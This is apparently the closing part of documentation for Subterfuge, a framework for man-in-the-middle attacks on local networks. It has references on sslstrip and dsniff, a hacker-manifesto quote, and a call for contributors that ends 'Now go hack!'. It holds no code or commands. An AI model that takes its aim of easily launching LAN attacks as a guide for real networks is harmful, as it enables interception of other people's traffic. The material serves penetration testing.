[7] Marlinspike, M. (2011, August 30). Blackhat. Retrieved from http://blackhat.com/presentations/bh-europe-09/Marlinspike/blackhat-europe-2009-marlinspike-sslstrip-slides.pdf

[8] Song, D. (2012, January 1). Dsniff Frequently Asked Questions. Retrieved from http://www.monkey.org/~dugsong/dsniff/faq.html

[9] Ogle, J. and Wagner, E. (2012, March 8). Hotel Network Security: A Study of Computer Networks in U.S. Hotels. Retrieved from http://www.hotelschool.cornell.edu/research/chr/pubs/reports/abstract-14928.html



[1] Django documentation: https://docs.djangoproject.com/en/dev/topics/templates/

Contributing to the Project

I made a discovery today. I found a computer. Wait a second, this is cool. It does what I want it to. If it makes a mistake, it’s because I screwed it up. Not because it doesn’t like me… Or feels threatened by me…

The Mentor

Vision

Subterfuge is still a work in progress. The project has seen an exciting amount of community support, but we still have a long way to go. Our goal is to create an all-encompassing framework from which to easily launch attacks against the LAN. Subterfuge will continue to integrate with other pieces of the penetration tester’s toolkit to allow a user to efficiently conduct a full spectrum penetration test.

In the future we would like Subterfuge to contain a database of possible attack methods and vectors in order to demonstrate the risk and vulnerability respectively. Because of the modular nature of the framework expandability should continue to be simple.

What can you do?

If you’re interested in contributing to the Subterfuge Project we might be able to use your help. As the framework is still in Beta any reviews, comments, or critiques are helpful. We also appreciate any and all issues logged on our Google Code site; we try to get to those bugs as quickly as possible. If you would like to go a step further feel free to contact us with suggestions, or develop your own modules. If you submit them to us we’ll try to get them added to the package for you.

Other than that the simple support you all give is always helpful. Thanks. Now go hack!